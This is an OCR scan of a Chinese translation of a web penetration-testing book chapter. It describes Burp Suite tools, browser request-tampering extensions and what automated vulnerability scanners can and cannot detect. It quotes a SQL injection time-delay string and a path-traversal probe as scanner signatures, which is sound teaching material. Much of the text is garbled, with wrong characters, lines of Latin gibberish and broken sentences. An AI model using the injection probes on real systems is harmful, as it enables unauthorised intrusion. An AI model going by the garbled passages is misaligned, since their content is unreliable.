口 发 布 请 求 时 自动 使 用 正确 的 Referer 消 息 头 。 一 些 应 用 程序 可 能 会 
检查 这 个 消息 头 的 内 容 ， 这 项 功能 可 确保 讨 虫 义 可 能 以 类 似 于 普通 浏览 
器 的 方式 运行 。 

口 控制 在 自动 抓 取 过 程 中 使 用 的 其 他 HTTP 消息 头 。 

口 控制 提出 的 自动 抓 取 请 求 的 速度 与 顺序 ， 避 免 这 些 请 求 令 攻 击 目 
Hit; 如 有 必要 ， 确 保 抓 取 在 隐秘 状态 下 进行 。 
3. 应 用 程序 测试 器 

虽然 仅 使 用 手动 技巧 也 可 以 成 功 实施 攻击 ， 但 是 ， 要 成 为 一 名 真正 
成 熟 的 Web 应 用 程序 渗透 测试 员 ， 必 须 在 攻击 过 程 中 利用 自动 化 工具 ， 
提高 攻击 速度 与 效率 。 第 14 章 已 经 详细 介绍 了 如 何 使 用 自动 化 工具 。 集 
成 测试 套件 中 的 每 一 个 工具 都 具有 自动 完成 各 种 常见 任务 的 功能 。 以 下 
是 各 种 工具 套件 的 主要 功能 。 

口 手动 配置 音 见 漏洞 扫描 。 渗 透 测试 员 可 以 利用 这 项 功能 准确 控制 
使 用 哪些 攻击 字符 串 ， 以 及 如 何 将 它们 合并 到 请 求 中 并 审查 其 结果 ， 确 
定 任 何 有 助 于 深入 调查 的 不 篆 见 的 或 反 稼 的 啊 应 。 

口 一 组 内 置 的 攻击 有 效 载 和 荷 和 易 变 函数 ， 以 用 户 定 义 的 方式 生成 任 
意 有 效 载 荷 。 例 如 ， 根 据 畸 形 编码 、 字 符 置 换 、 变 力 、 从 前 某 个 攻击 中 
获得 的 数据 等 。 

O 能够 保存 扫 摘 啊 应 数据 ， 将 其 用 在 报告 中 ， 或 者 合并 到 其 他 攻击 


口 查看 和 分 析 响 应 的 定制 化 功能 。 例 如 ， 可 根据 特定 表达 式 或 有 效 
载荷 自身 是 否 出 现 查看 和 分 析 响应 (参见 图 20-9) 。 
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图 20-9 ”使 用 Burp Intruder 测 试 漏洞 练习 的 结果 





a 从 应 用 程序 的 啊 应 中 提取 有 用 数据 的 功能 。 例 如 ， 从 “用 户 资 
料 ” 页 面 解析 用 户 名 和 密码 字段 。 当 利用 会 话 处 理 和 访问 控制 等 漏洞 时 
可 以 用 到 这 项 功能 。 

4. Web 漏 洞 扫描 器 

一 些 集成 测试 套件 提供 扫描 常见 Web 应 用 程序 漏洞 的 功能 ， 所 执行 
的 扫 摘 主要 分 为 以 下 两 类 。 

口 被 动 扫 描 ， 包 括 监视 通过 本 地 代理 服务 器 传递 的 请 求 和 啊 应 ， 以 
确定 各 种 漏洞 ， 如 提交 明文 密码 、cookie 配 置 错 误 以 及 路 域 Referer 汇 
露 。 可 以 以 非 入 侵 的 方式 对 使 用 浏览 器 访问 的 任何 应 用 程序 执行 此 类 扫 
描 。 在 确定 渗透 测试 的 效果 时 ， 此 功能 往往 非常 有 用 ， 通 过 它 可 以 确定 
应 用 程序 相对 于 上 述 漏洞 的 安全 状态 。 

O 主动 扫描 ， 包 括 同 目标 应 用 程序 发 送 请 求 来 探查 各 种 漏洞 ， 如 中 
站 点 脚本 、HPPT 消 息 头 注入 和 文件 路 径 般 历 。 和 任何 其 他 主动 测试 一 
Be ea 只 有 在 获得 应 用 程序 所 有 者 的 同意 后 才 
可 以 实施 。 














HE EE PAS Js TLS ad TT VO EY a fina, WUE Pe lA 
fier in SHO PUT BSAC. AP Ae ge Heike eGURLIF Ea 
取 和 测试 应 用 程序 ， 相 反 ， 用 尸 可 以 指示 扫描 需 如 何 测试 应 用 程序 ， 精 
确 控制 扫 插 哪些 请 求 ， 并 收 到 有 关 单 个 请 求 的 实时 反馈 。 以 下 是 集成 测 
试 套 件 扫描 功能 的 一 些 典 型 用 法 。 

口 手 动 解析 应 用 程序 的 内 容 后 ， 可 以 选择 站 扣 地 图 中 感 兴趣 的 功能 
区 域 并 由 扫描 霹 扫 描 这 些 区 域 。 这 有 助 于 将 可 用 时 间 用 于 扫描 最 关键 的 
区 域 ， 并 更 迅速 地 获得 扫描 结果 。 

口 手动 训 试 单个 请 求 时 ， 作 为 补充 ， 可 以 在 测试 时 扫描 每 个 特定 的 
请 求 。 这 样 做 可 以 立即 获得 与 这 些 请 求 包含 的 第 见 漏洞 有 关 的 反馈 ， 从 
而 为 手动 测试 提供 指导 并 对 其 进行 优化 。 

口 可 以 使 用 目 动 抓 取 工具 抓 取 整个 应 用 程序 ， 然 后 扫描 发 现 的 所 有 
内 容 。 这 个 过 程 与 独立 Web 扫 描 器 的 基本 行为 类 似 。 

口 在 Burp Suite 中 ， 可 以 在 浏览 喜 中 激活 实时 扫描 ， 然 后 使 用 浏览 
融 指 导 扫 描 响 的 扫描 范围 ， 并 迅速 收 到 与 提出 的 每 个 请 求 有 关 的 反 饮 ， 
而 无 须 手 动 确 定 要 扫描 的 请 求 。 图 20-10 显 示 了 实时 扫描 的 结果 。 
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图 20- 10 使 用 BurpScanner 浏 览 时 的 实时 扫描 结果 








虽然 集成 测试 套件 中 的 扫描 需 的 设计 用 途 不 同 于 独立 扫描 右 ， 但 
是 ， 我 们 将 在 本 章 后 面部 分 讲 到 ， 在 东 些 情况 下 ， 这 些 扫描 器 的 核心 扫 
描 引 擎 非常 强大 ， 其 能 力 甚 至 优 于 主流 的 独立 扫描 器 。 

5. 手动 请 求 工 具 

发 布 一 个 请 求 并 碍 看 它 的 啊 应 是 集成 测试 套件 中 的 手动 请 求 组 件 的 
基本 功能 。 虽 然 非常 简单 ， 但 在 以 下 情况 下 ， 这 项 功能 可 提供 极 大 大 
By: 尝试 性 地 探 全 一 个 漏洞 ， 需 要 多 次 手动 发 布 同 一 个 请 求 ， 并 调整 请 
求 元 素 以 确定 应 用 程序 的 行为 所 受到 的 影响 。 当 然 ， 也 可 以 使 用 一 个 独 
并 的 工具 (如 Netcat〉 来 完成 这 项 任务 。 但 是 ， 如 果 将 这 项 功能 内 置 在 
套件 中 ， 残 可 以 迅速 从 其 他 组 件 〈 代 理 服 务 器 、 疏 时 或 漏洞 测试 妖 ) 中 
获取 感 兴趣 的 请 求 ， 对 其 进行 手动 调查 。 而 且 ， 手 动 请 求 工具 还 可 以 得 











荔 于 套件 执行 的 各 种 共享 功能 ， 如 HIML 呈 现 、 文 持 下 行 代理 
(downstream proxy) 与 验证 、 自 动 上 传 Content-Length 消 息 涉 。 图 20-11 
是 一 个 手动 重新 发 布 的 请 求 。 
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图 20-11 使 用 BurpRepeater 手 动 重新 发 布 的 请 求 




















以 下 是 各 种 手动 请 求 工 具 的 主要 功能 。 

口 与 其 他 套件 组 件 相互 整合 ， 能 够 与 其 他 组 件 相 互 传递 任何 请 求 ， 
以 进行 深入 调查 。 

口 保存 所 有 请 求 与 啊 应 的 历史 记录 ， 完 整 记 录 所 有 手动 请 求 ， 以 方 
Pe Beamer tage ae eee ge ela a 
TJ o 

口 包含 多 个 选项 卡 的 界面 ， 一 次 可 以 处 理 几 个 不 同 的 项 目 。 

口 能 够 自动 跟踪 重 定 问 。 

















6. 会 话 令 牌 分 析 器 
一 些 测试 套件 提供 各 种 分 析 功 能 ， 可 用 于 分 析 应 用 程序 使 用 的 需要 
不 可 预见 性 的 会 话 cookie 和 其 他 令 牌 的 随机 性 。Burp Sequencer 是 一 种 强 
大 的 工具 ， 可 以 对 任意 大 小 的 令 牌 样本 的 随机 性 进行 标准 的 统计 测试 ， 
并 以 可 访问 的 格式 提供 详细 结果 。 图 20-12 显 示 了 Burp Sequencer 工 具 ， 
有 关 该 工具 的 详情 ， 请 参阅 第 7 章 。 
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FPS result 
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图 20-12 ”使 用 BurpSequencer 测 试 应 用 程序 会 话 令 牌 的 随机 性 





7. 共享 功能 与 实用 工具 

除 核心 组 件 外 ， 集 成 测试 套件 还 提供 大 量 其 他 “附加 值 ? 功 能 ， 以 满 
试 员 在 攻击 Web 应 用 程序 时 面临 的 特殊 需求 。 以 下 是 各 种 套件 
I 主要 功能 。 

口 分 析 HTTP 消 息 结构 ， 包 括 解析 消息 头 与 请 求 的 参数 ， 以 及 解压 
常见 序列 化 格式 ( 见 图 20-13)。 








图 20-13 ”分析 请 求 与 响应 的 HTTP 结 构 与 参数 


口 在 啊 应 中 呈现 HITML 内 容 ， 就 像 在 浏览 器 中 那样 。 

口 能 够 以 文本 和 十 六 进 制 格式 显示 和 编辑 消息 。 

口 所 有 请 求 与 啊 应 中 的 搜索 功能 。 

口 手动 编辑 消息 内 容 后 ， 自 动 上 传 HITP Content-Length 消 息 头 。 
ai a Oe 
数据 。 

口 比 较 两 个 响应 ， 突 出 显示 其 不 同 之 处 。 

口 自动 化 内 容 发 现 与 攻击 面 分 析 。 

口 能 够 在 磁盘 上 保存 当前 测试 会 话 ， 并 检索 已 保存 的 会 话 。 

口 文 持 “下 行 ?代理 和 SOCKS 人 代理， 允许 将 不 同 的 工具 组 合 在 一 起 ， 
通过 所 在 的 组 织 或 ISP 使 用 的 代理 服务 器 访问 应 用 程序 。 

口 在 工具 内 支持 HTTP 验 证 方法 ， 人 允许 在 应 用 这 些 方 法 的 环境 (如 
局 域 网 ) 中 使 用 套件 的 所 有 功能 。 

口 文 持 客户 端 SSL 证 书 ， 人 允许 攻击 使 用 这 些 证 书 的 应 用 程序 。 

口 处 理 更 隐蔽 的 HTTP 特 性 ， 如 gzip 内 容 编 码 、 块 传输 编码 与 状态 码 
0 的 过 渡 响 应 。 

口 可 扩展 性 ， 使 用 第 三 方 代码 可 任意 修改 和 扩展 内 置 功能 。 

口 可 以 安排 各 种 常规 任务 ， 如 抓 取 和 扫描 ， 而 无 须 手 动 控 制 。 

口 保留 工具 选项 配置 ， 帮 助 在 下 次 运行 套件 时 恢复 到 某 个 特殊 设 
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使 用 集成 测试 套件 的 典型 工作 流程 如 图 20-14 所 示 。 每 个 测试 阶段 
所 涉及 的 关键 步骤 将 在 整 本 书 中 详细 介绍 ， 并 在 第 21 章 的 方法 论 中 列 
i. 绍 的 工作 流程 说 明了 测试 套件 的 不 同 组 件 与 该 人 法 论 之 间 的 
X 系 。 


识别 与 分 析 ， 
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在 此 工作 流程 中 ， 测 试 员 将 使 用 浏览 器 推动 整个 测试 流程 。 在 通过 
拦截 代理 服务 器 浏览 应 用 程序 时 ， 测 试 套件 将 编译 以 下 两 类 关键 信息 。 





Pi 代理 服务 器 历 史记 录 ， 记 录 通 过 代理 服务 器 传送 的 每 一 个 请 求 和 
Ha} DV. 。 

口 站 点 地 图 ， 记 录 在 目标 的 目录 树 视 图 中 发 现 的 所 有 项 目 。 

(注意 ， 在 以 上 两 种 情况 下 ， 显 示 融 的 默认 过 滤器 可 能 会 隐藏 菜 些 
通常 在 测试 时 没有 用 处 的 项 目 。) 

如 第 4 章 所 述 ， 在 测试 应 用 程序 时 ， 测 试 套 件 通常 会 对 发 现 的 内 容 
进行 被 动 抓 取 。 这 一 操作 将 使 用 通过 代理 服务 器 传送 的 所 有 请 求 更 新 站 
点 地 图 ， 并 添加 基于 代理 服务 器 传送 的 啊 应 确定 (通过 解析 链接 、 表 
单 、 脚 本 等 ) 的 项 目 。 使 用 浏览 器 手动 确定 应 用 程序 的 可 见 内 容 后 ， 还 
可 以 使 用 “ 限 虫 > 和 “内 容 碍 找 ” 功 能 主动 探查 应 用 程序 的 其 他 内 容 。 这 些 
工具 的 输出 表单 也 将 添加 到 站 点 地 图 中 。 

解析 应 用 程序 的 内 容 和 功能 后 ， 束 可 以 开始 评估 它 的 受 攻击 面 。 受 
攻击 面 是 各 种 功能 和 请 求 的 集合 ， 测 试 员 应 对 其 进行 仔细 检查 ， 以 演 试 
发 现 和 利用 相关 漏洞 。 

通常 ， 在 测试 漏洞 时 ， 可 以 从 代理 服务 器 拦截 窗口 、 代 理 服 务 器 历 
史记 录 或 站 点 地 图 中 选择 项 目 ， 然 后 将 这 些 项 目 传 送 给 其 他 工具 ， 以 执 
行 特定 的 任务 。 如 前 所 述 ， 可 以 使 用 模糊 测试 探查 基于 输入 的 漏洞 ， 并 
实施 其 他 攻击 ， 如 截取 敏感 信息 ;可 以 通过 漏洞 扫描 器 使 用 被 动 和 主动 
技巧 目 动 查找 常见 漏洞 ， 可 以 使 用 令 牌 分 析 右 工具 测试 会 话 cookie 和 其 
他 令 牌 的 随机 性 ， 还 可 以 使 用 请 求 Repeater 修 改 单个 请 求 ， 然 后 不 断 提 
出 这 个 请 求 ， 以 探查 漏洞 或 利用 已 发 现 的 缺陷 。 通 常 ， 测 试 员 需要 在 这 
些 不 同 的 工具 之 间 来 回 传送 各 个 项 目 。 例 如 ， 测 试 员 可 以 从 模糊 测试 攻 
击 中 选择 某 个 感 兴 趣 的 项 目 ， 或 选择 由 漏洞 扫 摘 器 报告 的 问题 ， 并 将 其 
传送 给 请 求 Repeater， 以 验证 漏洞 是 否 存 在 ， 或 对 攻击 进行 优化 。 

通常 ， 对 于 许多 类 型 的 漏洞 ， 测 试 员 需 要 返回 浏览 器 以 作 进 一 步调 
查 ， 确 认 某 个 明显 的 漏洞 是 否 确 实 存 在 ， 或 测试 正在 进行 的 攻击 。 例 
如 ， 使 用 漏洞 扫描 器 或 请 求 Repeater 发 现 跨 站 点 脚本 漏洞 后 ， 可 以 将 生 
成 的 URL 粘 贴 到 浏览 喜 中 ， 以 确认 概念 验证 攻击 是 否 会 执行 。 测 试 可 能 
的 访问 控制 漏洞 时 ， 可 以 查看 当前 浏览 器 会 话 中 特定 请 求 的 结果 ， 以 在 
特定 用 户 权 限 下 确认 这 些 结果 。 如 果 发 现 可 用 于 提取 大 量 信息 的 SQL 注 
入 漏洞 ， 浏 览 右 是 显示 相关 结果 的 最 有 利 的 位 置 。 

测试 员 并 不 需要 严格 遵循 本 节 介 绍 的 工作 流程 ， 也 不 应 受到 该 流程 
的 任何 限制 。 在 许多 情况 下 ， 可 以 直接 在 浏览 器 或 代理 服务 器 拦截 窗口 
中 输入 意外 输入 来 测试 漏洞 。 一 些 漏 洞 可 能 会 立即 在 请 求 和 啊 应 中 表露 
出 来 ， 而 无 须 使 用 任何 更 具 针 对 性 的 工具 。 为 实现 特定 的 目的 ， 可 以 引 
入 其 他 工具 ， 还 可 以 以 本 节 并 未 介绍 的 创新 性 方式 ， 甚 至 连 工具 开发 者 
都 未 想到 的 方式 组 合 使 用 测试 套件 的 各 个 组 件 。 利 用 各 种 相互 关联 的 特 
































性 ， 集 成 测试 套件 可 发 挥 非常 强大 的 功能 。 在 使 用 它们 时 越 有 创造 性 ， 
就 越 有 可 能 发 现 最 隐秘 的 漏洞 。 


20.2.3 ”拦截 代理 服务 器 vane =! 


应 该 在 工具 包 中 始终 保留 一 个 工具 ， 以 备 在 极 少 数 常 用 的 基于 代理 
服务 器 的 工具 无 法 使 用 的 情况 下 使 用 。 在 需要 使 用 非 标准 的 验证 方法 直 
接 或 通过 企业 代理 服务 器 访问 应 用 程序 ， 或 者 应 用 程序 使 用 不 常用 的 客 
户 端 SSL 证 书 或 浏览 器 扩展 时 ， 往 往 需 要 使 用 蔡 代 工具 。 在 这 些 情况 
下 ， 因 为 拦截 代理 服务 器 会 中 断 客 户 端 与 服务 器 之 间 的 HITP 连 接 ， 使 
用 基于 代理 服务 器 的 工具 可 能 无 法 访问 应 用 程序 的 一 部 分 或 全 部 功能 。 

这 时 ， 和 常 规 的 蔡 代 方 法 是 使 用 内 藤 在 浏览 器 内 的 工具 监控 和 操纵 浏 
览 器 生成 的 HITP 请 求 。 从 理论 上 讲 ， 此 时 客户 端 执行 的 全 部 操作 以 及 
回 服务 器 提交 的 所 有 数据 ， 仍 然 由 测试 员 完 全 控制 。 如 果 硕 望 拥 有 控制 
权 ， 可 以 编写 完全 定制 的 浏览 器 来 执行 所 需 的 任何 任务 。 使 用 这 些 浏 览 
器 扩展 的 目的 在 于 帮助 标准 浏览 器 迅速 高 效 地 实现 其 功能 ， 而 不 会 干扰 
浏览 器 与 服务 器 之 间 的 网 络 层 通信 。 因 此 ， 测 试 员 可 以 通过 这 种 方法 癌 
ee ee 
常 通信 。 

Internet Explorer 与 Firefox 都 有 大 量 扩 展 ， 它 们 的 功能 基本 相似 。 我 
们 将 分 别 举 出 一 个 示例 ， 同 时 也 建议 测试 员 首 先 试用 各 种 扩展 ， 然 后 再 
从 中 选择 最 适合 自己 的 一 种 。 

还 要 注意 ， 与 主要 的 工具 套件 相 比 ， 当 前 浏览 器 扩展 的 功能 有 限 。 
它们 不 能 进行 任何 抓 取 、 模 糊 测 试 或 漏洞 扫描 ， 而 且 使 用 它们 必须 完全 
手动 操作 。 但 是 ， 在 某 些 情况 下 仍然 需要 使 用 它们 ， 因 为 它们 可 帮助 渗 
透 测 试 员 对 攻击 目标 实施 仅 使 用 标准 浏览 器 无 法 实现 的 全 面 攻击 。 

1. Tamper Data 

Tamper Data 是 一 个 Firefox 浏 览 器 扩展 。 任 何 时 候 ， 只 要 提交 一 个 表 
单 ，Tamper Data 束 会 弹出 一 个 对 话 框 ， 显 示 与 请 求 有 关 的 所 有 信息 
(包括 HTTP 消 息 头 与 参数 ) ， 并 允许 查看 和 修改 这 些 内 容 ， 如 图 20-15 
所 示 。 
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2. TamperlE 


图 20-15 “在 Firefox 中 使 用 TamperData 修 改 HTTP 请 求 


TamperIE 是 一 个 Internet Explorer 浏 览 器 扩展 ， 它 的 功能 与 Firefox 浏 
览 器 的 Tamper Data 扩 展 的 功能 基本 相同 ， 如 图 20-16 所 示 。 
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Lk You may tamper with this data using this dialog, 


er Send origina! dats 
Configure this tool... 本 zend orig 
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图 20-16 





在 Internet Explorer4 


使 用 TamperIE 修 改 HTTP 请 3 








有 许多 工具 可 目 动 对 Web 应 用 程序 进行 漏洞 扫描 。 这 些 扫描 需 的 主 
要 优点 是 ， 能 够 在 相对 较 短 的 时 间 内 测试 大 量 功 能 ， 并 且 能 够 发 现 汕 见 
应 用 程序 中 存在 的 各 种 重要 漏洞 。 

Web 应 用 程序 漏洞 扫描 需 能 够 目 动 执行 本 书 中 介绍 的 各 种 测试 技 
IJ, AMHER, ERARUS ELAR, URRA E IAY 
FSET LAE IN A Aa, ARRAN E ERDRE EENEI — 
PERRE BINNIE TT, PRT Ee de, Me 
常见 漏洞 的 签名 。 接 下 来 ， 扫 摘 占 生 成 一 个 报告 ， 描 述 它 发 现 的 每 一 个 
漏洞。 通常 ， 这 份 报告 中 包括 用 于 诊断 每 一 个 被 发 现 的 漏洞 的 请 求 与 啊 
应 ， 允 许 经 验 丰 富 的 用 户 对 它们 进行 手动 调查 ， 人 确认 漏洞 是 否 存 在 。 

决定 是 否 以 及 何 时 使 用 一 个 漏洞 扫描 器 的 关键 在 于 ， 理 解 这 些 工 具 
的 内 在 优 缺 点 与 在 开发 它们 的 过 程 中 面临 的 挑战 。 这 些 考 虑 事项 还 会 影 














啊 能 人 否 充 分 利用 一 个 目 动 扫描 融 ， 以 及 如 何 解释 与 是 否 信任 它 的 扫描 结 


fe) 





使 用 扫描 器 可 以 相当 可 靠 地 探测 到 几 种 常见 的 漏洞 。 这 些 漏 洞 都 有 
非常 明显 的 签名 。 有 些 情况 下 ， 这 些 签名 就 在 应 用 程序 的 常见 请 求 与 响 
应 中 。 还 有 些 情 况 下 ， 如 果 确 定 汤 洞 已 经 存在 ， 扫 描 嚣 会 发 送 一 个 专门 
设计 的 请 求 ， 以 触发 它 的 签名 。 如 果 签 名 出 现在 应 用 程序 对 这 个 请 求 的 
MEI, ABA Fat as we AT Pe HELO, URE ASAE TE o 

下 面 列 出 几 个 可 以 通过 这 种 方法 探测 到 的 漏洞 。 

口 反射 型 跨 站 点 脚本 漏洞 。 如 果 用 户 提 交 的 输入 未 经 过 适当 的 净 
化 ， 在 应 用 程序 的 啊 应 中 “反射 ?回来 ， 就 会 出 现 这 种 漏洞 。 上 自动 扫 摘 器 
通常 会 发 送 包 含 HTML 标 记 的 测试 字符 串 ， 然 后 在 响应 中 搜索 这 些 字符 
串 ， 从 而 确定 许多 这 种 类 型 的 漏洞 。 

口 一 些 SQL 注入 漏洞 可 通过 某 个 签名 确定 。 例 如 ， 提 区 一 个 单 引 号 
可 能 会 导致 应 用 程序 返回 一 条 ODBC 错 误 消 息 ; 或 者 ， 提 交 字 符 串 '; 
waitfor delay ‘0:0:30’-- 可 能 会 造成 时 间 延 迟 。 

口 一 些 路 径 遍 历 漏洞 可 通过 提 区 一 个 针对 茶 个 已 知 文 件 〈 如 win.ini 
的 过 历 序列 ， 然 后 在 请 求 中 搜索 该 文件 是 否 出 现 ， 从 而 
进行 确定 。 























D 一 些 命 令 注 入 漏洞 可 通过 注入 一 个 引起 时 间 延 迟 ， 或 者 将 茶 个 特 
殊 的 字符 串 “ 反 射 ? 到 应 用 程序 的 啊 应 中 的 命令 确定 。 

O 直接 目录 列表 可 通过 请 求 目 录 路 径 ， 然 后 寻找 一 个 包含 看 似 为 目 
录 列 表 的 文本 的 啊 应 ， 从 而 加 以 确定 。 

口 明文 密码 提交 、 范 围 宽泛 的 cookie、 激 活 自 动 完成 的 表单 等 漏洞 
可 通过 审 碍 应 用 程序 提出 的 常见 请 求 与 啊 应 有 效 确 定 。 

口 通常 ， 使 用 不 同 的 文件 扩展 名 请 求 每 个 枚 举 出 的 资源 ， 可 以 发 现 
在 主要 的 公布 内 容 中 没有 提供 链接 的 数据 ， 如 备份 文件 和 资源 文件 。 

对 上 面 的 许多 漏洞 而 言 ， 有 时 候 ， 使 用 一 个 标准 的 攻击 字符 如 和 签 
名 无 法 有 效 探 测 到 相同 类 型 的 漏洞 。 例 如 ， 为 阻止 基于 输入 的 漏洞 ， 应 
用 程序 会 执行 茶 种 使 用 专门 设计 的 输入 即 可 避 开 的 不 完善 的 输入 确认 。 
普通 的 攻击 字符 串 将 被 阻止 或 净化 ; 但是， 经 验 丰富 的 攻击 者 能 够 探 奋 
到 应 用 程序 实施 的 输入 确认 ， 并 找到 避 开 这 种 确认 的 方法 。 其 他 情况 
下 ， 标 准 的 攻击 字符 串 可 能 会 触 友 一 个 漏洞 ， 但 不 会 生成 想 要 的 签名 。 
例如 ， 许 多 SQL 注入 攻击 并 不 会 导致 应 用 程序 癌 用 户 返 回 任何 数据 或 错 
误 消息 ; 同样 ， 路 径 志 历 漏洞 也 不 会 让 目标 文件 的 内 容 在 应 用 程序 的 啊 
应 中 直接 返回 。 

此 外 ， 有 几 种 重要 的 漏洞 并 没有 明确 的 签名 ， 使 用 一 组 标准 的 攻击 
字符 串 也 无 法 友 现 它们 。 通 常 ， 自 动 扫 摘 咒 并 不 能 发 现 这 种 类 型 的 漏 
洞 。 下 面 是 一 些 扫 搬 右 无 法 准确 判定 的 漏洞 。 

口 不 完善 的 访问 控制 。 这 种 漏洞 可 使 用 户 能 够 访问 其 他 用 户 的 数 
据 ， 或 者 允许 低 权限 用 户 访问 管理 功能 。 扫 描 融 不 了 解 应 用 程序 的 访问 
i 
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口 通过 修改 参数 值 给 应 用 程序 的 行为 造成 影响 的 攻击 。 例 如 ， 修 改 
一 个 表示 两 品 价格 或 订单 状态 的 隐藏 字段 。 扫 描 需 并 不 了 解 任何 参数 在 
实现 应 用 程序 功能 过 程 中 所 发 挥 的 作用 。 

O 其 他 逻辑 错误 ， 如 使 用 负 值 突破 交易 限额 ， 或 者 通过 省 略 一 个 关 
键 的 请 求 参数 避 开 账户 恢复 过 程 的 茶 个 阶段 。 

口 应 用 程序 功能 设计 方面 的 漏洞 ， 如 脆弱 密码 强度 规则 ， 从 登录 失 
败 消 妃 中 枚 举 用 户 的 功能 ， 以 及 保密 性 不 强 的 筷 记 密码 提示 。 

口 会 话 劫持 攻击 。 攻 击 者 可 在 应 用 程序 的 会 话 令 牌 中 找到 一 个 序 
列 ， 伪 疤 成 其 他 用 户 。 即 使 扫描 器 能 确定 某 个 参数 在 连续 登录 过 程 中 使 
a 0 0 0 
容 的 意义 。 

口 泄露 敏感 信息 ， 如 用 户 名 列表 和 包含 会 话 令 牌 的 日 志 。 

一 些 漏 洞 扫 描 需 符 试 检查 上 述 东 些 漏 调 。 例 如 ， 某 些 扫描 才 答 试 以 
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两 个 不 同 的 用 户 喘 份 登录 ， 并 确定 一 名 用 户 无 须 正 确 授权 即 可 访问 的 数 
据 和 功能 ， 以 此 确定 访问 控制 漏洞 。 根 据 笔者 的 经 验 ， 这 些 类 型 的 检查 
通 弟 会 生成 大 量 错误 警报 和 漏 报 。 

在 前 面 列 出 的 两 组 漏洞 中 ， 每 一 组 都 包含 明显 的 漏洞 ， 也 就 是 那些 
可 被 技术 尚 不 熟练 的 攻击 者 发 现 和 利用 的 漏洞 。 因 此 ， 虽 然 自动 扫 搬 器 
能 够 探查 到 应 用 程序 中 存在 的 大 部 分 明显 的 漏洞 ， 但 它 还 是 会 遗漏 许多 
这 类 漏洞 ， 其 中 包括 一 些 非 常 明显 的 漏洞 ， 只 要 进行 手动 扫描 即 可 探测 
到 。 目 动 扫 描 需 根本 不 能 提供 任何 保证 ， 证 明 应 用 程序 中 不 存在 一 些 可 
被 攻击 者 轻易 发 现 和 利用 的 严重 漏洞 。 

同样 ， 对 于 当前 必须 经 过 严格 测试 的 、 更 注重 安全 的 应 用 程序 而 
ee ee 

漏洞 。 
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法 ， 我 们 面临 着 各 种 内 在 的 障碍 。 只 有 拥有 成 熟 的 人 工 智能 引擎 ， 远 远 
超越 当前 扫描 器 性 能 的 系统 ， 才 能 有 效 突破 这 些 障碍 。 

1. Web 应 用 程序 各 不 相同 

Web 应 用 程 友 与 网 络 和 基础 架构 截然 不 同 。 通 第 ， 后 者 大 多 及 用 标 
准 配 置 的 非 定 制 产 品 。 从 理论 上 讲 ， 我 们 可 以 提前 为 所 有 可 能 的 目标 构 
律 一 个 数据 库 ， 然 后 创建 一 个 工具 探查 网 络 和 基础 架构 中 存在 的 漏洞 。 
但 是 ， 我 们 却 不 能 以 这 种 方式 探查 定制 Web 应 用 程序 中 的 漏洞 ， 因 此 ， 
任何 高 效 的 扫描 器 必须 能 够 预见 意外 的 情况 。 

2. 扫描 器 不 理解 语法 

计算 机 擅长 分 析 应 用 程序 啊 应 的 语法 内 容 ， 能 够 识别 常见 的 错误 消 
恩 、HTTP 状 态 码 与 被 复制 到 Web 页 面 中 的 用 户 提 交 的 数据 。 然 而 ， 今 
天 的 扫 插 更 并 不 能 理解 这 些 内 容 的 语法 意义 ， 也 不 能 根据 这 些 意义 做 出 
合理 的 判断 。 例 如 ， 在 更 新 购物 八 的 功能 中 ,扫描 器 能 够 查看 提交 给 该 
功能 的 大 量 参数 。 扫 描 器 并 不 知道 哪个 参数 表示 数量 ， 哪 个 参数 表示 价 
格 。 力 外 ， 它 也 不 能 判定 修改 订单 的 数量 并 不 符合 逻辑 ， 而 可 修改 其 价 
格 则 代表 一 个 严重 的 漏洞 。 

3. FFM as AS Zo “BI” Wh E 

许多 Web 应 用 程序 使 用 非 标准 的 机 制 处 理会 话 与 导航 ， 传 送 和 处 理 

数据 ， 例 如 ， 通 过 查询 字符 串 、cookie 或 其 他 参数 。 人 类 立即 能 够 注意 



































到 并 解析 这 些 不 常用 的 机 制 ， 但 计算 机 会 继续 遵循 它 的 标准 规则 。 而 
且 ， 许 多 针对 Web 应 用 程序 的 攻击 需要 茶 种 “即兴 ”处 理 ， 例 如 ， 部 分 避 
开 有 效 的 输入 过 小， 或 者 利用 应 用 程序 行为 的 几 个 不 同方 面 为 攻击 创造 
条 件 。 通 常 ， 扫 描 器 没有 能 力 实施 这 些 攻 击 。 

4. 扫描 器 并 无 直觉 

TABLA BE EA it RENTER. SRA FAH AERA AN Be 
击 方法 ， 是 对 每 一 项 功能 答 试 每 一 种 攻击 。 这 种 方法 在 所 能 执行 的 检查 
种 类 以 及 组 合 这 些 检查 的 方式 上 存在 着 诸多 限制 。 在 许多 情况 下 ， 这 种 
方法 往往 会 忽略 漏洞 的 存在 ， 如 下 所 示 。 

口 一 些 攻 击 需 要 在 一 个 多 阶段 处 理 过 程 的 一 个 或 几 个 阶段 提交 专门 
设计 的 输入 ， 然 后 完成 整个 处 理 过 程 ， 并 观察 处 理 结果 。 

口 一 些 攻 击 需要 改变 应 用 程序 执行 某 个 多 阶段 处 理 的 预定 顺序 。 

口 一 些 攻击 需要 以 专门 设计 的 方式 修改 多 个 参数 的 值 。 例 如 ， 一 个 
XSS 攻 击 需 要 在 一 个 参数 中 插入 一 个 特殊 的 值 ， 使 得 应 用 程序 生成 错误 
消 轧 ;并 在 另 一 个 参数 中 插入 被 复制 到 错误 消息 中 的 XSS 有 效 载 傈 。 

由 于 扫 摘 亏 所 使 用 的 探查 漏洞 的 窗 力 方法 存在 的 实际 限制 ， 它 们 并 
不 能 向 每 一 个 参数 或 者 每 一 个 处 理 阶 段 提 交 所 有 攻击 字符 串 。 当 然 ， 也 
没有 人 能 够 做 到 这 一 点 ;但 是 ， 人 类 往往 能 够 “察觉 ?可 能 存在 的 漏洞 、 
开发 者 做 出 的 某 种 假设 以 及 似乎 有 什么 不 太 正 第 的 位 置 。 因 此 ， 渗 透 测 
pee es ae 
现 漏洞 。 
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的 漏洞 的 能 力 〈 如 前 所 述 ) ， 而 且 会 损害 它 执行 解析 应 用 程序 内 容 、 探 
查 漏洞 等 核心 任务 的 能 力 。 

其 中 一 些 挑 战 并 非 无 法 元 服 ， 如 今 的 扫描 吉 已 新 增 了 各 种 功能 ， 可 
在 一 定 程度 上 克服 这 些 挑战 。 但 是 ， 扫 描 并 不 是 一 种 完美 的 解决 方案 ， 
现代 扫描 技术 的 效率 因 不 同 应 用 程序 而 腊 。 

1. 验证 与 会 话 处 理 

扫描 需 必 须 能 够 处 理 各 种 应 用 程序 使 用 的 验证 与 会 话 处 理 机 制 。 通 
